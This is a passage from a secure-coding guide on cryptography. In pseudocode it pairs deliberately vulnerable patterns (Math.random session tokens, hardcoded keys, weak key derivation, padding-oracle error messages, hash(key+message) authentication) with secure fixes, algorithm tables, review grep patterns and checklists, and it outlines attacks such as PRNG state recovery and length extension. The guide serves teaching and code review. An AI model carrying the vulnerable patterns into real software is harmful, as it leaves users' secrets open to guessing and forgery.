toString(floor(random() * 16), base = 16) + return token + +// VULNERABLE: Math.random for session ID +function createSessionId(): + return "session_" + toString(random() * 1000000000) + +// VULNERABLE: Seeded random with predictable seed +function generateApiKey(userId): + setSeed(userId * getCurrentTimestamp()) + key = "" + for i in range(32): + key = key + randomChoice(ALPHANUMERIC_CHARS) + return key + +// VULNERABLE: Using non-crypto random for encryption IV +function quickEncrypt(data, key): + iv = [] + for i in range(16): + iv.append(floor(random() * 256)) + return AES_CBC_encrypt(key, iv, data) + +// VULNERABLE: JavaScript Math.random() is NOT cryptographic +function generateToken(): + return btoa(String.fromCharCode.apply(null, + Array.from({length: 32}, () => Math.floor(Math.random() * 256)) + )) +``` + +**Why This Is Dangerous:** +- Math.random() uses predictable pseudo-random number generators (PRNG) +- Internal state can be recovered from ~600 outputs (in V8 engine) +- Once state is known, all past and future values are predictable +- Session tokens, API keys, and reset tokens become guessable +- Many PRNG implementations have short periods or weak seeding + +**State Recovery Attack:** +```pseudocode +// Attacker collects multiple password reset tokens +tokens_observed = [ + "a3f7c2e9b1d4...", // Token 1 + "8e2a5f1c9b3d...", // Token 2 + // ... collect ~30-50 tokens +] + +// Using z3 SMT solver or custom reversing: +function recoverMathRandomState(observed_outputs): + // V8's xorshift128+ can be reversed + // Once state recovered, predict next token + state = reverseEngineerState(observed_outputs) + next_token = predictNextOutput(state) + return next_token + +// Attacker generates password reset for victim +// Then predicts the token value +// Completes password reset without email access +``` + +--- + +### BAD Example 5: Hardcoded Symmetric Keys + +```pseudocode +// VULNERABLE: Key in source code +ENCRYPTION_KEY = "MySecretKey12345" + +function encryptUserData(data): + return AES_encrypt(ENCRYPTION_KEY, data) + +// VULNERABLE: Key derived from application constant +function getEncryptionKey(): + return sha256(APPLICATION_NAME + ENVIRONMENT + "secret") + +// VULNERABLE: Same key for all users +MASTER_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef") + +function encryptForUser(userId, data): + return AES_encrypt(MASTER_KEY, data) + +// VULNERABLE: Key in configuration file (committed to git) +// config.py: +CRYPTO_CONFIG = { + "encryption_key": "dGhpcyBpcyBhIHNlY3JldCBrZXk=", // Base64 encoded + "hmac_key": "another_secret_key_here" +} + +// VULNERABLE: Weak key (too short) +function quickEncrypt(data): + key = "short" // 5 bytes, not 16/24/32 + return AES_encrypt(pad(key, 16), data) // Padded with zeros! +``` + +**Why This Is Dangerous:** +- Keys in source code are exposed in version control history forever +- Hardcoded keys cannot be rotated without code deployment +- Compilation/decompilation exposes keys in binaries +- Single key compromise affects all encrypted data +- Weak/short keys can be brute-forced +- Key derivation from predictable inputs allows reconstruction + +--- + +### BAD Example 6: Weak Key Derivation + +```pseudocode +// VULNERABLE: Direct use of password as key +function deriveKey(password): + return password.encode()[:32] // Truncate or pad to key size + +// VULNERABLE: Simple hash as key derivation +function passwordToKey(password): + return sha256(password) // Single round, no salt + +// VULNERABLE: MD5-based key derivation +function getKeyFromPassword(password, salt): + return md5(password + salt) + +// VULNERABLE: Insufficient iterations +function deriveKeyPBKDF2(password, salt): + return PBKDF2(password, salt, iterations = 1000) + // 2025 recommendation: minimum 600,000 for SHA256 + +// VULNERABLE: Using key derivation output directly for multiple purposes +function setupCrypto(password, salt): + derived = PBKDF2(password, salt, iterations = 100000, keyLength = 64) + encryptionKey = derived[:32] // First half + hmacKey = derived[32:] // Second half + // Problem: related keys, should use separate derivations + +// VULNERABLE: Weak salt (too short, predictable, or reused) +function deriveKeyWithWeakSalt(password): + salt = "salt" // Static salt defeats purpose + return PBKDF2(password, salt, iterations = 100000) +``` + +**Why This Is Dangerous:** +- Direct password use gives attackers dictionary attack advantage +- Single-hash derivation enables GPU-accelerated brute force +- Low iteration counts make PBKDF2/bcrypt fast to attack +- MD5 key derivation inherits all MD5 weaknesses +- Static/weak salt enables precomputation attacks +- Related key derivation can expose cryptographic weaknesses + +**Iteration Count Guidance (2025):** +```pseudocode +// PBKDF2-SHA256 minimum iterations by use case: +// - Interactive login (100ms budget): 600,000 iterations +// - Background/async (1s budget): 2,000,000 iterations +// - High-security (offline storage): 10,000,000 iterations + +// bcrypt cost factor: +// - Minimum 2025: cost = 12 (about 250ms) +// - Recommended: cost = 13-14 +// - High-security: cost = 15+ + +// Argon2id parameters (2025): +// - Memory: 64 MB minimum, 256 MB recommended +// - Iterations: 3 minimum +// - Parallelism: match available cores +// - Argon2id recommended over Argon2i or Argon2d +``` + +--- + +## GOOD Examples: Secure Cryptographic Patterns + +### GOOD Example 1: Proper Password Hashing with bcrypt/Argon2 + +```pseudocode +// SECURE: bcrypt with appropriate cost factor +function hashPassword(password): + // Cost factor 12 = ~250ms on modern hardware + // Increase cost factor annually as hardware improves + cost = 12 + return bcrypt.hash(password, cost) + +function verifyPassword(password, storedHash): + // bcrypt.verify handles timing-safe comparison internally + return bcrypt.verify(password, storedHash) + +// SECURE: Argon2id (recommended for new applications) +function hashPasswordArgon2(password): + // Argon2id: hybrid resistant to both side-channel and GPU attacks + options = { + type: ARGON2ID, + memoryCost: 65536, // 64 MB + timeCost: 3, // 3 iterations + parallelism: 4, // 4 parallel threads + hashLength: 32 // 256-bit output + } + return argon2.hash(password, options) + +function verifyPasswordArgon2(password, storedHash): + return argon2.verify(storedHash, password) + +// SECURE: scrypt for memory-hard hashing +function hashPasswordScrypt(password): + // N = CPU/memory cost (power of 2) + // r = block size + // p = parallelization parameter + salt = generateSecureRandom(16) + hash = scrypt(password, salt, N = 2^17, r = 8, p = 1, keyLen = 32) + return encodeSaltAndHash(salt, hash) + +// SECURE: Migrating from weak to strong hashing +function upgradePasswordHash(userId, password, currentHash): + // Verify against old hash + if legacyVerify(password, currentHash): + // Re-hash with modern algorithm + newHash = hashPasswordArgon2(password) + database.update("users", userId, {"password_hash": newHash}) + return true + return false +``` + +**Why This Is Secure:** +- bcrypt/argon2/scrypt are deliberately slow (memory-hard) +- Built-in salt generation and storage +- Timing-safe comparison built into verify functions +- Configurable work factors allow future-proofing +- Argon2id is resistant to both GPU attacks and side-channel attacks + +--- + +### GOOD Example 2: Authenticated Encryption (GCM Mode) + +```pseudocode +// SECURE: AES-256-GCM with proper nonce handling +function encryptAESGCM(plaintext, key): + // Generate cryptographically random 96-bit nonce + nonce = generateSecureRandom(12) + + cipher = createCipher("AES-256-GCM", key) + cipher.setNonce(nonce) + + // Optional: Add authenticated additional data (AAD) + // AAD is authenticated but NOT encrypted + aad = "context:user_data:v1" + cipher.setAAD(aad) + + ciphertext = cipher.encrypt(plaintext) + authTag = cipher.getAuthTag() // 128-bit tag + + // Return nonce + tag + ciphertext (all needed for decryption) + return nonce + authTag + ciphertext + +function decryptAESGCM(encryptedData, key): + // Extract components + nonce = encryptedData[:12] + authTag = encryptedData[12:28] + ciphertext = encryptedData[28:] + + cipher = createCipher("AES-256-GCM", key) + cipher.setNonce(nonce) + cipher.setAAD("context:user_data:v1") // Must match encryption + cipher.setAuthTag(authTag) + + try: + plaintext = cipher.decrypt(ciphertext) + return plaintext + catch AuthenticationError: + // Tag verification failed - data tampered or wrong key + log.warn("Decryption authentication failed - possible tampering") + return null + +// SECURE: XChaCha20-Poly1305 (extended nonce variant) +function encryptXChaCha(plaintext, key): + // 192-bit nonce - safe for random generation + nonce = generateSecureRandom(24) + + ciphertext, tag = xchachapoly.encrypt(key, nonce, plaintext) + + return nonce + tag + ciphertext +``` + +**Why This Is Secure:** +- GCM provides both confidentiality AND integrity +- Authentication tag detects any tampering +- 96-bit nonces are safe for random generation up to ~2^32 messages per key +- XChaCha20 has 192-bit nonce, safe for effectively unlimited messages +- AAD allows binding ciphertext to context (prevents cross-context attacks) + +--- + +### GOOD Example 3: Proper IV/Nonce Generation + +```pseudocode +// SECURE: Random IV for CBC mode +function encryptCBC(plaintext, key): + // 128-bit random IV for AES + iv = generateSecureRandom(16) + + cipher = createCipher("AES-256-CBC", key) + ciphertext = cipher.encrypt(plaintext, iv) + + // Prepend IV to ciphertext (IV doesn't need to be secret) + return iv + ciphertext + +function decryptCBC(encryptedData, key): + iv = encryptedData[:16] + ciphertext = encryptedData[16:] + + cipher = createCipher("AES-256-CBC", key) + return cipher.decrypt(ciphertext, iv) + +// SECURE: Counter-based nonce with random prefix (for GCM) +class SecureNonceGenerator: + // Random 32-bit prefix + 64-bit counter + // Safe for 2^64 messages with same key + + function __init__(): + this.prefix = generateSecureRandom(4) // 32-bit random + this.counter = 0 + this.lock = Mutex() + + function generate(): + this.lock.acquire() + this.counter = this.counter + 1 + if this.counter >= 2^64: + throw Error("Nonce counter exhausted - rotate key") + nonce = this.prefix + intToBytes(this.counter, 8) + this.lock.release() + return nonce + +// SECURE: Synthetic IV (SIV) for nonce-misuse resistance +function encryptSIV(plaintext, key): + // AES-GCM-SIV: Safe even if nonce is accidentally repeated + nonce = generateSecureRandom(12) + ciphertext = AES_GCM_SIV_encrypt(key, nonce, plaintext) + return nonce + ciphertext + // Note: Repeated nonce only leaks if same plaintext encrypted +``` + +**Why This Is Secure:** +- Random IVs prevent pattern analysis across messages +- Prepending IV to ciphertext ensures IV is always available for decryption +- Counter with random prefix prevents nonce collision across instances +- SIV modes provide safety net against accidental nonce reuse + +--- + +### GOOD Example 4: Cryptographically Secure Random + +```pseudocode +// SECURE: Using OS/platform CSPRNG + +// Node.js +function generateSecureRandom(length): + return crypto.randomBytes(length) + +// Python +function generateSecureRandom(length): + return secrets.token_bytes(length) + +// Java +function generateSecureRandom(length): + random = SecureRandom.getInstanceStrong() + bytes = new byte[length] + random.nextBytes(bytes) + return bytes + +// Go +function generateSecureRandom(length): + bytes = make([]byte, length) + _, err = crypto_rand.Read(bytes) + if err != nil: + panic("CSPRNG failure") + return bytes + +// SECURE: Token generation for URLs/APIs +function generateUrlSafeToken(length): + // Generate random bytes, encode to URL-safe base64 + randomBytes = generateSecureRandom(length) + return base64UrlEncode(randomBytes) + +function generateResetToken(): + // 256 bits of entropy for password reset token + return generateUrlSafeToken(32) + +function generateApiKey(): + // Prefix for identification + random component + prefix = "sk_live_" + randomPart = generateUrlSafeToken(24) + return prefix + randomPart + +// SECURE: Random number in range +function secureRandomInt(min, max): + range = max - min + 1 + bytesNeeded = ceil(log2(range) / 8) + + // Rejection sampling to avoid modulo bias + while true: + randomBytes = generateSecureRandom(bytesNeeded) + value = bytesToInt(randomBytes) + if value < (2^(bytesNeeded*8) / range) * range: + return min + (value % range) +``` + +**Why This Is Secure:** +- CSPRNG (Cryptographically Secure PRNG) uses OS entropy sources +- Cannot be predicted even with complete knowledge of outputs +- Proper rejection sampling avoids modulo bias +- Standard libraries provide secure defaults when used correctly + +--- + +### GOOD Example 5: Key Derivation Functions + +```pseudocode +// SECURE: PBKDF2 with sufficient iterations +function deriveKeyPBKDF2(password, purpose): + // Generate unique salt per derivation + salt = generateSecureRandom(16) + + // 600,000 iterations minimum for SHA-256 (2025) + iterations = 600000 + + // Derive key of required length + derivedKey = PBKDF2( + password = password, + salt = salt, + iterations = iterations, + keyLength = 32, // 256 bits + hashFunction = SHA256 + ) + + // Store salt with derived key for later verification + return {salt: salt, key: derivedKey} + +// SECURE: HKDF for deriving multiple keys from one secret +function deriveMultipleKeys(masterSecret, purpose): + // HKDF-Extract: Create pseudorandom key from input + salt = generateSecureRandom(32) + prk = HKDF_Extract(salt, masterSecret) + + // HKDF-Expand: Derive purpose-specific keys + encryptionKey = HKDF_Expand(prk, info = "encryption", length = 32) + hmacKey = HKDF_Expand(prk, info = "authentication", length = 32) + searchKey = HKDF_Expand(prk, info = "search-index", length = 32) + + return { + encryption: encryptionKey, + hmac: hmacKey, + search: searchKey, + salt: salt // Store for re-derivation + } + +// SECURE: Argon2 for password-based key derivation +function deriveKeyFromPassword(password, salt = null): + if salt == null: + salt = generateSecureRandom(16) + + derivedKey = argon2id( + password = password, + salt = salt, + memoryCost = 65536, // 64 MB + timeCost = 3, + parallelism = 4, + outputLength = 32 + ) + + return {key: derivedKey, salt: salt} + +// SECURE: Key derivation with domain separation +function deriveKeyWithContext(masterKey, context, subkeyId): + // Context prevents cross-purpose key use + info = context + ":" + subkeyId + return HKDF_Expand(masterKey, info, 32) + +// Example: Derive per-user encryption keys +function getUserEncryptionKey(masterKey, userId): + return deriveKeyWithContext(masterKey, "user-data-encryption", userId) +``` + +**Why This Is Secure:** +- High iteration counts make brute-force impractical +- HKDF properly separates multiple keys from one source +- Domain separation prevents keys derived for one purpose being used for another +- Argon2 provides memory-hard protection against GPU attacks +- Unique salt per derivation prevents precomputation attacks + +--- + +### GOOD Example 6: Key Rotation Patterns + +```pseudocode +// SECURE: Key versioning for rotation +class KeyManager: + function __init__(keyStore): + this.keyStore = keyStore + this.currentKeyVersion = keyStore.getCurrentVersion() + + function encrypt(plaintext): + key = this.keyStore.getKey(this.currentKeyVersion) + nonce = generateSecureRandom(12) + + ciphertext = AES_GCM_encrypt(key, nonce, plaintext) + + // Include key version in output for decryption + return encodeVersionedCiphertext( + version = this.currentKeyVersion, + nonce = nonce, + ciphertext = ciphertext + ) + + function decrypt(encryptedData): + version, nonce, ciphertext = decodeVersionedCiphertext(encryptedData) + + // Fetch correct key version (may be old version) + key = this.keyStore.getKey(version) + if key == null: + throw KeyNotFoundError("Key version " + version + " not available") + + return AES_GCM_decrypt(key, nonce, ciphertext) + + function rotateKey(): + newVersion = this.currentKeyVersion + 1 + newKey = generateSecureRandom(32) + this.keyStore.storeKey(newVersion, newKey) + this.currentKeyVersion = newVersion + + // Schedule background re-encryption of old data + scheduleReEncryption(newVersion - 1, newVersion) + +// SECURE: Re-encryption during key rotation +function reEncryptData(dataId, oldVersion, newVersion, keyManager): + // Fetch encrypted data + encryptedData = database.get("encrypted_data", dataId) + + // Verify it uses old key version + currentVersion = extractKeyVersion(encryptedData) + if currentVersion >= newVersion: + return // Already using new or newer key + + // Decrypt with old key, re-encrypt with new + plaintext = keyManager.decrypt(encryptedData) + newEncryptedData = keyManager.encrypt(plaintext) + + // Atomic update + database.update("encrypted_data", dataId, { + "data": newEncryptedData, + "key_version": newVersion, + "rotated_at": getCurrentTimestamp() + }) + +// SECURE: Key wrapping for storage +function storeEncryptionKey(keyToStore, masterKey): + // Wrap (encrypt) the key with master key + nonce = generateSecureRandom(12) + wrappedKey = AES_GCM_encrypt(masterKey, nonce, keyToStore) + + return { + wrapped_key: wrappedKey, + nonce: nonce, + algorithm: "AES-256-GCM", + created_at: getCurrentTimestamp() + } + +function retrieveEncryptionKey(wrappedKeyData, masterKey): + return AES_GCM_decrypt( + masterKey, + wrappedKeyData.nonce, + wrappedKeyData.wrapped_key + ) +``` + +**Why This Is Secure:** +- Key versioning allows old data to remain decryptable during rotation +- Background re-encryption gradually migrates all data to new key +- Key wrapping protects stored keys at rest +- Gradual rotation minimizes operational risk + +--- + +## Edge Cases Section + +### Edge Case 1: Padding Oracle Vulnerabilities + +```pseudocode +// VULNERABLE: Revealing padding validity in error messages +function decryptCBC_vulnerable(ciphertext, key, iv): + try: + plaintext = AES_CBC_decrypt(key, iv, ciphertext) + unpadded = removePKCS7Padding(plaintext) + return {success: true, data: unpadded} + catch PaddingError: + return {success: false, error: "Invalid padding"} // ORACLE! + catch DecryptionError: + return {success: false, error: "Decryption failed"} + +// Attack: Padding oracle allows full plaintext recovery +// Attacker modifies ciphertext bytes, observes padding errors +// ~128 requests per byte to recover plaintext (on average) + +// SECURE: Use authenticated encryption (GCM) or constant-time handling +function decryptCBC_secure(ciphertext, key, iv): + try: + // First verify HMAC before any decryption + providedHmac = ciphertext[-32:] + ciphertextData = ciphertext[:-32] + + expectedHmac = HMAC_SHA256(key, iv + ciphertextData) + if not constantTimeEquals(providedHmac, expectedHmac): + return {success: false, error: "Decryption failed"} // Generic error + + plaintext = AES_CBC_decrypt(key, iv, ciphertextData) + unpadded = removePKCS7Padding(plaintext) + return {success: true, data: unpadded} + catch: + return {success: false, error: "Decryption failed"} // Same error always + +// BEST: Just use GCM which prevents this class of attack entirely +``` + +**Lesson Learned:** +- Never reveal whether padding was valid or invalid +- Always use authenticated encryption (encrypt-then-MAC or GCM) +- Return identical errors for all decryption failures + +--- + +### Edge Case 2: Length Extension Attacks + +```pseudocode +// VULNERABLE: Using hash(secret + message) for authentication +function createAuthToken(secretKey, message): + return sha256(secretKey + message) // Length extension vulnerable! + +function verifyAuthToken(secretKey, message, token): + expected = sha256(secretKey + message) + return token == expected + +// Attack: Attacker knows hash(secret + message) and length of secret +// Can compute hash(secret + message + padding + attacker_data) +// Without knowing the secret! + +// Example attack: +// Original: hash(secret + "amount=100") = abc123... +// Attacker computes: hash(secret + "amount=100" + padding + "&amount=999") +// Server verifies this as valid! + +// SECURE: Use HMAC +function createAuthTokenSecure(secretKey, message): + return HMAC_SHA256(secretKey, message) + +function verifyAuthTokenSecure(secretKey, message, token): + expected = HMAC_SHA256(secretKey, message) + return constantTimeEquals(token, expected) + +// SECURE: Use hash(message + secret) - prevents extension but HMAC preferred +// SECURE: Use SHA-3/SHA-512/256 (resistant to length extension) +function alternativeAuth(secretKey, message): + return SHA3_256(secretKey + message) // SHA-3 is resistant +``` + +**Lesson Learned:** +- Never use hash(key + message) for authentication +- HMAC is specifically designed to prevent length extension +- SHA-3 family is resistant but HMAC is still recommended for consistency + +--- + +### Edge Case 3: Timing Attacks on Comparison + +```pseudocode +// VULNERABLE: Early-exit string comparison +function verifyToken(providedToken, expectedToken): + if length(providedToken) != length(expectedToken): + return false + for i in range(length(providedToken)): + if providedToken[i] != expectedToken[i]: + return false // Early exit reveals position of first difference + return true + +// Attack: Timing differences reveal correct characters +// Correct first char: ~1μs longer than wrong first char +// Attacker can brute-force character-by-character + +// VULNERABLE: Using == operator (language-dependent timing) +function checkHmac(provided, expected): + return provided == expected // May have variable-time implementation + +// SECURE: Constant-time comparison +function constantTimeEquals(a, b): + if length(a) != length(b): + // Still constant-time for the comparison + // Length difference may leak - consider padding + return false + + result = 0 + for i in range(length(a)): + // XOR and OR accumulate differences without early exit + result = result | (a[i] XOR b[i]) + return result == 0 + +// SECURE: Using crypto library comparison +function verifyHmacSecure(message, providedHmac, key): + expectedHmac = HMAC_SHA256(key, message) + return crypto.timingSafeEqual(providedHmac, expectedHmac) + +// SECURE: Double-HMAC comparison (timing-safe by design) +function verifyWithDoubleHmac(message, providedMac, key): + expectedMac = HMAC_SHA256(key, message) + // Compare HMACs of the MACs - timing doesn't leak original MAC + return HMAC_SHA256(key, providedMac) == HMAC_SHA256(key, expectedMac) +``` + +**Lesson Learned:** +- Use constant-time comparison for all secret-dependent operations +- Most languages have crypto libraries with timing-safe functions +- Double-HMAC trick works when constant-time compare isn't available + +--- + +### Edge Case 4: Key Reuse Across Contexts + +```pseudocode +// VULNERABLE: Same key for encryption and authentication +SHARED_KEY = loadKey("master") + +function encryptData(data): + return AES_GCM_encrypt(SHARED_KEY, generateNonce(), data) + +function signData(data): + return HMAC_SHA256(SHARED_KEY, data) // Same key! + +// Problem: Cryptographic interactions between uses +// Some attacks become possible when key is used in multiple algorithms + +// VULNERABLE: Same key for different users/tenants +function encryptForTenant(tenantId, data): + return AES_GCM_encrypt(MASTER_KEY, generateNonce(), data) + // All tenants share encryption key - one compromise = all compromised + +// SECURE: Derive separate keys for each purpose +MASTER_KEY = loadKey("master") + +function getEncryptionKey(): + return HKDF_Expand(MASTER_KEY, "encryption-aes-256-gcm", 32) + +function getAuthenticationKey(): + return HKDF_Expand(MASTER_KEY, "authentication-hmac-sha256", 32) + +function getSearchKey(): + return HKDF_Expand(MASTER_KEY, "searchable-encryption", 32) + +// SECURE: Per-tenant key derivation +function getTenantEncryptionKey(tenantId): + // Each tenant gets unique derived key + info = "tenant-encryption:" + tenantId + return HKDF_Expand(MASTER_KEY, info, 32) + +function encryptForTenantSecure(tenantId, data): + tenantKey = getTenantEncryptionKey(tenantId) + return AES_GCM_encrypt(tenantKey, generateNonce(), data) +``` + +**Lesson Learned:** +- Always derive separate keys for different cryptographic operations +- Use domain separation (different "info" parameters) in HKDF +- Per-tenant/per-user key derivation limits blast radius of compromise + +--- + +## Common Mistakes Section + +### Common Mistake 1: Using Encryption Without Authentication + +```pseudocode +// COMMON MISTAKE: CBC encryption without HMAC +function encryptDataWrong(data, key): + iv = generateSecureRandom(16) + ciphertext = AES_CBC_encrypt(key, iv, data) + return iv + ciphertext + // Missing: No way to detect tampering! + +// Attack: Bit-flipping in CBC mode +// Flipping bit N in ciphertext block C[i] flips bit N in plaintext block P[i+1] +// Attacker can modify data without detection + +// Example: Encrypted JSON {"admin": false, "amount": 100} +// Attacker can flip bits to change "false" to "true" or modify amount + +// CORRECT: Encrypt-then-MAC +function encryptDataCorrect(data, encKey, macKey): + iv = generateSecureRandom(16) + ciphertext = AES_CBC_encrypt(encKey, iv, data) + + // MAC covers IV and ciphertext + mac = HMAC_SHA256(macKey, iv + ciphertext) + + return iv + ciphertext + mac + +function decryptDataCorrect(encrypted, encKey, macKey): + iv = encrypted[:16] + mac = encrypted[-32:] + ciphertext = encrypted[16:-32] + + // Verify MAC FIRST, before any decryption + expectedMac = HMAC_SHA256(macKey, iv + ciphertext) + if not constantTimeEquals(mac, expectedMac): + throw IntegrityError("Data has been tampered with") + + return AES_CBC_decrypt(encKey, iv, ciphertext) + +// BETTER: Just use GCM which includes authentication +function encryptDataBest(data, key): + nonce = generateSecureRandom(12) + ciphertext, tag = AES_GCM_encrypt(key, nonce, data) + return nonce + ciphertext + tag +``` + +**Solution:** +- Always use authenticated encryption (GCM, ChaCha20-Poly1305) +- If using CBC, add HMAC with encrypt-then-MAC pattern +- Verify authentication tag BEFORE decryption + +--- + +### Common Mistake 2: Confusing Encoding with Encryption + +```pseudocode +// COMMON MISTAKE: Base64 as "encryption" +function "encrypt"Data(sensitiveData): + return base64Encode(sensitiveData) // NOT ENCRYPTION! + +function "decrypt"Data(encodedData): + return base64Decode(encodedData) + +// COMMON MISTAKE: XOR with short key as encryption +function "encrypt"WithXor(data, password): + key = password.repeat(ceil(length(data) / length(password))) + return xor(data, key) // Trivially broken with frequency analysis + +// COMMON MISTAKE: ROT13 or character substitution +function "encrypt"Text(text): + return rot13(text) // No security at all + +// COMMON MISTAKE: Obfuscation ≠ encryption +function storeApiKey(apiKey): + obfuscated = "" + for char in apiKey: + obfuscated += chr(ord(char) + 5) // Just shifted characters + return obfuscated + +// COMMON MISTAKE: Custom "encryption" algorithm +function myEncrypt(data, key): + result = "" + for i, char in enumerate(data): + newChar = chr((ord(char) + ord(key[i % len(key)]) * 7) % 256) + result += newChar + return result // Easily broken - don't invent crypto! +``` + +**Reality Check:** +| Method | Security Level | Use Case | +|--------|----------------|----------| +| Base64 | 0 (None) | Binary-to-text encoding only | +| ROT13 | 0 (None) | Jokes, spoiler hiding | +| XOR with repeated key | Trivially broken | Never use | +| Homegrown "encryption" | Unknown, likely broken | Never use | +| AES-GCM with random key | Strong | Actual encryption | + +**Solution:** +- Use standard algorithms: AES-GCM, ChaCha20-Poly1305 +- Never invent cryptographic algorithms +- Encoding (Base64, hex) is for representation, not security + +--- + +### Common Mistake 3: Improper Key Storage After Generation + +```pseudocode +// COMMON MISTAKE: Logging the key +function generateAndStoreKey(): + key = generateSecureRandom(32) + log.info("Generated new encryption key: " + hexEncode(key)) // LOGGED! + return key + +// COMMON MISTAKE: Key in config file committed to git +// config.json: +{ + "database_url": "...", + "encryption_key": "a1b2c3d4e5f6..." // Will be in git history forever +} + +// COMMON MISTAKE: Key in environment variable visible in process list +// Launching: ENCRYPTION_KEY=secret123 ./myapp +// `ps aux` shows: myapp ENCRYPTION_KEY=secret123 + +// COMMON MISTAKE: Key stored in database alongside encrypted data +function storeEncryptedData(userId, sensitiveData): + key = generateSecureRandom(32) + encrypted = AES_GCM_encrypt(key, generateNonce(), sensitiveData) + database.insert("user_data", { + user_id: userId, + encrypted_data: encrypted, + encryption_key: key // KEY NEXT TO DATA = pointless encryption + }) + +// COMMON MISTAKE: Key derivation material stored insecurely +function setupEncryption(password): + salt = generateSecureRandom(16) + key = deriveKey(password, salt) + + // Storing in easily accessible location + localStorage.setItem("encryption_salt", salt) + localStorage.setItem("derived_key", key) // KEY IN BROWSER STORAGE! +``` + +**Secure Key Storage Patterns:** +```pseudocode +// SECURE: Using a key management service (KMS) +function storeKeySecurely(keyId, keyMaterial): + // AWS KMS, Azure Key Vault, GCP KMS, HashiCorp Vault + kms.storeKey(keyId, keyMaterial, { + rotation_period: "90 days", + deletion_protection: true, + access_policy: restrictedPolicy + }) + +// SECURE: Key wrapped with hardware security module (HSM) +function wrapKeyForStorage(dataKey): + wrappingKey = hsm.getWrappingKey() // Never leaves HSM + wrappedKey = hsm.wrapKey(dataKey, wrappingKey) + return wrappedKey // Safe to store - can only unwrap with HSM + +// SECURE: Envelope encryption pattern +function envelopeEncrypt(data): + // Generate data encryption key (DEK) + dek = generateSecureRandom(32) + + // Encrypt data with DEK + encryptedData = AES_GCM_encrypt(dek, generateNonce(), data) + + // Encrypt DEK with key encryption key (KEK) from KMS + encryptedDek = kms.encrypt(dek) + + // Store encrypted DEK with encrypted data + return { + encrypted_data: encryptedData, + encrypted_key: encryptedDek, // DEK is encrypted, safe to store + kms_key_id: kms.getCurrentKeyId() + } +``` + +--- + +## Algorithm Selection Guidance + +### Symmetric Encryption + +| Algorithm | Key Size | Use Case | Notes | +|-----------|----------|----------|-------| +| **AES-256-GCM** | 256 bits | General purpose | Recommended default, 96-bit nonce | +| **ChaCha20-Poly1305** | 256 bits | Performance-sensitive, mobile | Faster without AES-NI hardware | +| **XChaCha20-Poly1305** | 256 bits | High-volume encryption | 192-bit nonce, safe for random generation | +| **AES-256-GCM-SIV** | 256 bits | Nonce-misuse resistant | Slightly slower, safer with accidental reuse | + +**Avoid:** DES, 3DES, RC4, Blowfish, AES-ECB, AES-CBC without HMAC + +### Password Hashing + +| Algorithm | Memory | Use Case | Notes | +|-----------|--------|----------|-------| +| **Argon2id** | 64+ MB | New applications | Best protection, memory-hard | +| **bcrypt** | N/A | Legacy compatibility | Widely supported, cost 12+ | +| **scrypt** | 64+ MB | When Argon2 unavailable | Good alternative | + +**Avoid:** MD5, SHA1, SHA256 (single round), PBKDF2 with <600k iterations + +### Key Derivation + +| Algorithm | Use Case | Notes | +|-----------|----------|-------| +| **Argon2id** | Password-based | Best for password → key | +| **HKDF** | Key expansion | Deriving multiple keys from one | +| **PBKDF2-SHA256** | Compatibility | 600k+ iterations required | + +**Avoid:** MD5-based KDF, single-hash derivation, low iteration counts + +### Message Authentication + +| Algorithm | Output | Use Case | Notes | +|-----------|--------|----------|-------| +| **HMAC-SHA256** | 256 bits | General purpose | Standard choice | +| **HMAC-SHA512** | 512 bits | Extra security margin | Faster on 64-bit | +| **Poly1305** | 128 bits | With ChaCha20 | Part of AEAD | + +**Avoid:** MD5, SHA1, plain hash without HMAC construction + +### Digital Signatures + +| Algorithm | Use Case | Notes | +|-----------|----------|-------| +| **Ed25519** | General purpose | Fast, secure, simple API | +| **ECDSA P-256** | Compatibility | Widely supported | +| **RSA-PSS** | Legacy systems | 2048+ bit key required | + +**Avoid:** RSA PKCS#1 v1.5, DSA, ECDSA with weak curves + +--- + +## Detection Hints: How to Spot Cryptographic Issues + +### Code Review Patterns + +```pseudocode +// RED FLAGS in cryptographic code: + +// 1. Weak hash functions +md5( // Search for: md5\s*\( +sha1( // Search for: sha1\s*\( +SHA1.Create() // Search for: SHA1 + +// 2. ECB mode +mode = "ECB" // Search for: ECB +AES/ECB/ // Search for: /ECB/ +mode_ECB // Search for: ECB + +// 3. Static or weak IVs +iv = [0, 0, 0, ... // Search for: iv\s*=\s*\[0 +IV = "0000 // Search for: IV\s*=\s*["']0 +static IV // Search for: static.*[Ii][Vv] + +// 4. Math.random for security +Math.random() // Search for: Math\.random +random.randint( // Search for: randint\( (context matters) + +// 5. Weak secrets += "secret" // Search for: =\s*["']secret +SECRET = " // Search for: SECRET\s*=\s*["'] += "password" // Search for: =\s*["']password + +// 6. Direct password use as key +key = password // Search for: key\s*=\s*password +AES(password) // Search for: AES\s*\(\s*password + +// 7. Low iteration counts +iterations: 1000 // Search for: iterations.*\d{1,4}[^0-9] +rounds = 100 // Search for: rounds\s*=\s*\d{1,3}[^0-9] + +// GREP patterns for security review: +// [Mm][Dd]5\s*\( +// [Ss][Hh][Aa]1\s*\( +// ECB +// [Ii][Vv]\s*=\s*\[0 +// Math\.random +// iterations.*[0-9]{1,4}[^0-9] +// (password|secret)\s*=\s*["'] +``` + +### Security Testing Checklist + +```pseudocode +// Cryptographic security test cases: + +// 1. Algorithm verification +- [ ] No MD5 or SHA1 for password hashing +- [ ] No ECB mode encryption +- [ ] AES key size is 256 bits (not 128) +- [ ] Authenticated encryption used (GCM, ChaCha20-Poly1305) + +// 2. Randomness verification +- [ ] IVs/nonces are cryptographically random +- [ ] Session tokens use CSPRNG +- [ ] No predictable seeds for random generation + +// 3. Key management +- [ ] Keys not hardcoded in source +- [ ] Keys not logged or exposed in errors +- [ ] Key derivation uses appropriate KDF +- [ ] Key rotation mechanism exists + +// 4. Password hashing +- [ ] bcrypt cost ≥ 12 or Argon2 with appropriate params +- [ ] Unique salt per password +- [ ] Timing-safe comparison used + +// 5. Implementation details +- [ ] Constant-time comparison for secrets +- [ ] No padding oracle vulnerabilities +- [ ] HMAC used (not hash(key+message)) +- [ ] Authenticated encryption or encrypt-then-MAC +``` + +--- + +## Security Checklist + +- [ ] Password hashing uses Argon2id, bcrypt (cost 12+), or scrypt +- [ ] All passwords have unique, random salts (automatically handled by bcrypt/Argon2) +- [ ] No MD5, SHA1, or single-round SHA256 for security-sensitive hashing +- [ ] Encryption uses authenticated modes (AES-GCM, ChaCha20-Poly1305) +- [ ] No ECB mode encryption +- [ ] IVs/nonces generated with cryptographically secure random +- [ ] Each encryption operation uses unique 